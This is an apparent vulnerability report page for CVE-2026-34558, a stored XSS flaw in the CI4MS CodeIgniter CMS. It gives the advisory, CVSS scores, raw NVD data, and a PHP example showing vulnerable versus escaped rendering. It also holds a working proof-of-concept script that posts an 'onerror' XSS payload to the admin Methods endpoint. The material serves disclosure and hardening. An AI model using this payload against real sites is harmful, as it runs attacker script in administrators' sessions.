Security Vulnerability Report
CVE-2026-34558 CVSS 9.1 CRITICAL

CVE-2026-34558

Published: 2026-03-30 21:17:10
Last Modified: 2026-04-06 16:10:04

Description

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within the Methods Management functionality when creating or managing application methods/pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side without sanitization or output encoding. These stored values are later rendered directly into administrative interfaces and global navigation components without proper encoding, resulting in Stored DOM-Based Cross-Site Scripting (XSS). This issue has been patched in version 0.31.0.0.
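As an added illustration (not code from CI4MS, its advisory, or the fix shipped in 0.31.0.0), the PHP below renders a stored "method" record into a navigation menu in the pattern the description attributes to the affected views, and beside it the hardened form using CodeIgniter 4's esc() view helper with per-context encoding (html, attr, url). The record fields (name, slug, description), the <li><a> markup, and the stand-in esc() that is defined only when the script runs outside a CI4 request are assumptions for the example.

```php
<?php
// Added example for CVE-2026-34558 (illustrative, not code from CI4MS or its
// advisory). It renders a stored "method" record into a navigation menu the
// vulnerable way and the hardened way. The record fields (name, slug,
// description) and the <li><a> markup are assumptions about such a component.
declare(strict_types=1);

// Outside a CodeIgniter 4 request the framework's esc() view helper is not
// loaded, so a stand-in with the same calling convention is defined here.
// The real esc() delegates to Laminas\Escaper; this stand-in's 'attr' context
// is weaker than Laminas and is only adequate for values inside quoted attributes.
if (!function_exists('esc')) {
    function esc(string $data, string $context = 'html'): string
    {
        return match ($context) {
            'html', 'attr' => htmlspecialchars($data, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8'),
            'url'          => rawurlencode($data),  // one path segment, not a full URL
            'raw'          => $data,
            default        => throw new InvalidArgumentException("unsupported context: $context"),
        };
    }
}

// VULNERABLE (the pattern the advisory describes): stored values are interpolated
// into markup with no output encoding, so a method name such as
// <img src=x onerror=...> becomes live HTML on every page that shows the nav.
function renderNavItemVulnerable(array $method): string
{
    return '<li><a href="/' . $method['slug'] . '" title="' . $method['description'] . '">'
         . $method['name'] . '</a></li>';
}

// HARDENED: each dynamic value is encoded for the context it lands in (URL path
// segment, quoted attribute, element text). Input is not filtered at all; the
// fix sits at the output boundary, which is where CWE-79 is actually decided.
function renderNavItemSafe(array $method): string
{
    return '<li><a href="/' . esc($method['slug'], 'url') . '" title="' . esc($method['description'], 'attr') . '">'
         . esc($method['name'], 'html') . '</a></li>';
}

// If the nav is assembled client-side (the "DOM-based" part of the advisory),
// hand the records to JavaScript as JSON with the HEX flags so '<', '>', quotes
// and '&' can never close the <script> block, and insert them with textContent
// rather than innerHTML.
function renderNavDataForJs(array $methods): string
{
    $json = json_encode($methods, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR);
    return "<script>\n"
         . "const navMethods = {$json};\n"
         . "for (const m of navMethods) {\n"
         . "  const a = document.createElement('a');\n"
         . "  a.href = '/' + encodeURIComponent(m.slug);\n"
         . "  a.textContent = m.name;\n"
         . "  document.getElementById('nav').appendChild(a);\n"
         . "}\n"
         . "</script>";
}

// Throws if the hardened renderers let a raw tag or an attribute break-out through.
function selfCheck(array $stored): void
{
    $safe = renderNavItemSafe($stored);
    if (str_contains($safe, '<img') || str_contains($safe, '" onmouseover=')) {
        throw new RuntimeException('hardened HTML renderer leaked markup');
    }
    if (str_contains(renderNavDataForJs([$stored]), '<img')) {
        throw new RuntimeException('JSON handed to JavaScript leaked a raw tag');
    }
}

// Constructed sample record: the name carries the payload from this page's PoC,
// the description carries an attribute break-out attempt.
$stored = [
    'name'        => '<img src=x onerror=alert(document.cookie)>',
    'slug'        => 'payload',
    'description' => '" onmouseover="alert(1)',
];

echo renderNavItemVulnerable($stored), PHP_EOL;
echo renderNavItemSafe($stored), PHP_EOL;
echo renderNavDataForJs([$stored]), PHP_EOL;
selfCheck($stored);
```

Run it with `php nav_example.php` (PHP 8.0 or later, for match and str_contains). In a real CodeIgniter 4 view the same calls appear inline, for example `<?= esc($method->name) ?>` for text and `<?= esc($method->slug, 'url') ?>` inside an href; when reviewing the 0.31.0.0 fix, check that the encoding is applied on every output path (admin list, edit form, global navigation), because a stored value that is encoded in one view and echoed raw in another is still exploitable.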

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L

The 9.1 above is the secondary metric carried in the record below. NVD's primary assessment of the same CVE is CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H, base score 9.0 CRITICAL. The two differ on user interaction (NVD requires it, since an administrator has to load a page that renders the stored payload, the usual reading of a stored XSS) and on impact (NVD rates integrity and availability High rather than Low). Both agree on network access, low attack complexity, low privileges (an account able to create or edit methods) and changed scope, so the severity band is CRITICAL either way. Weakness: CWE-79 (Improper Neutralization of Input During Web Page Generation).

Configurations (Affected Products)

cpe:2.3:a:ci4-cms-erp:ci4ms:*:*:*:*:*:*:*:* - VULNERABLE
CI4MS < 0.31.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- PoC concept for stored (DOM-based) XSS in CI4MS < 0.31.0.0 -->
<!-- Step 1: a low-privileged user injects the payload via Methods Management.
     Run this from the application's own origin (for example the browser console
     of an authenticated low-privileged session) so the session cookie is sent.
     The endpoint path and field names are the PoC's illustration; confirm them
     against the target's form, and include its CSRF token field if one is enforced. -->
<script>
// URLSearchParams percent-encodes the '=' and '&' inside the payload, so the
// value survives application/x-www-form-urlencoded parsing intact.
const body = new URLSearchParams({
  method_name: '<img src=x onerror=alert(document.cookie)>',
  description: 'Payload',
});

fetch('/admin/methods/create', {
  method: 'POST',
  credentials: 'same-origin',   // send the existing session cookie
  headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
  body: body.toString(),
}).then(response => console.log('Payload injected, HTTP status', response.status));
</script>
<!-- Step 2: when an administrator opens a page that renders the stored method
     (admin dashboard or global navigation), the payload runs in the admin's session.
     alert() only proves execution: document.cookie exposes the session token only if
     the cookie lacks HttpOnly, but the script still acts with the admin's privileges
     inside the application either way. -->

References

https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-v77r-xg3p-75g7 (Exploit, Vendor Advisory, Mitigation)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34558", "sourceIdentifier": "[email protected]", "published": "2026-03-30T21:17:10.493", "lastModified": "2026-04-06T16:10:04.077", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within the Methods Management functionality when creating or managing application methods/pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side without sanitization or output encoding. These stored values are later rendered directly into administrative interfaces and global navigation components without proper encoding, resulting in Stored DOM-Based Cross-Site Scripting (XSS). This issue has been patched in version 0.31.0.0."}, {"lang": "es", "value": "CI4MS es un esqueleto de CMS basado en CodeIgniter 4 que ofrece una arquitectura modular lista para producción con autorización RBAC y soporte de temas. Antes de la versión 0.31.0.0, la aplicación no logra sanear correctamente la entrada controlada por el usuario dentro de la funcionalidad de Gestión de Métodos al crear o gestionar métodos/páginas de la aplicación. Múltiples campos de entrada aceptan cargas útiles de JavaScript controladas por el atacante que se almacenan en el servidor sin saneamiento ni codificación de salida. Estos valores almacenados se renderizan posteriormente directamente en interfaces administrativas y componentes de navegación global sin la codificación adecuada, lo que resulta en Cross-Site Scripting (XSS) persistente basado en DOM. Este problema ha sido parcheado en la versión 0.31.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 5.3}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ci4-cms-erp:ci4ms:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.31.0.0", "matchCriteriaId": "805F6B8A-9324-4CA4-BADE-439CC15DA14C"}]}]}], "references": [{"url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-v77r-xg3p-75g7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory", "Mitigation"]}]}}